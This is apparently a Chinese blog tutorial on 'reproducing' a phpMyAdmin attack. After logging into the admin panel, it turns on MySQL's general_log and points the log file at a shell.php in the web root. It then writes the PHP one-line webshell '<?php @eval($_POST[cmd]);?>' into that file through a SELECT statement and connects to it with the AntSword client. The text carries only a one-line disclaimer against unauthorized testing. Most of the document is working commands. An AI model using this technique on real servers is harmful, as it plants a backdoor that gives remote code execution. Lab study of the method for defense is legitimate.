PhPMyadmin-漏洞复现

前情条件是:首先将我们的PHP版本设置在5.5以上 注:禁止用于未授权的测试!

首先搭建环境,登录后台

点击》》SQL

查看当前的日志状态

复制代码
  SHOW VARIABLES LIKE 'general%';

因为之前我原来做过所以general_log 是开启的,如果vlau 是OFF时,可以使用

set global general_log = "ON";打开日志

然后后面打开genera_log_file 写到网站目录下

复制代码
  set global general_log_file='D:\\phpstudy_pro\\WWW\\pikachu-master\\shell.php'
前提是知道网站目录下

查看日志,​​看更改日志文件路径是否成功

日志文件里写入一句话木马

复制代码
  select '<?php @eval($_POST[cmd]);?>';

访问一下shell.php

复制代码
  http://pikachu-master/shell.php

能够成功访问

然后适用蚁剑连接

成功连接

相关推荐
Jahport29 分钟前
当量子计算时代进入倒计时,智能汽车的安全体系该如何重构?
人工智能·安全·重构·架构·量子计算·物联网安全
聚铭网络8 小时前
【一周安全资讯0509】《网络安全技术 网络安全漏洞分类分级指南》等5项国家公开标准意见;DENIC报告德国国家域名.de出现解析故障
安全·web安全
星幻元宇VR9 小时前
VR科普大空间:沉浸式公共教育新模式
科技·学习·安全·vr·虚拟现实
飞飞传输13 小时前
数字化科研提速关键 构建安全可控一体化跨网数据传输体系
大数据·运维·安全
wanhengidc13 小时前
服务器中带宽的重要性
运维·服务器·网络·安全·web安全
TENSORTEC腾视科技14 小时前
腾视科技AI大模型应用:提效、破局与落地,重塑智能新生态
人工智能·科技·安全·ai·ai大模型·无人叉车及智能调度系统解决方案
Lust Dusk15 小时前
移动安全资产--MobSF工具搭建教程
网络·安全·web安全·安全架构
耿公子和编程16 小时前
EasyBR 指纹浏览器深度体验:多账号运营的安全护城河
安全
码码哈哈0.016 小时前
基于 RSA 非对称加密与挑战码机制的前端登录安全方案
前端·安全·状态模式
Magic-Yuan17 小时前
LLM 十大安全风险 - 概述
人工智能·安全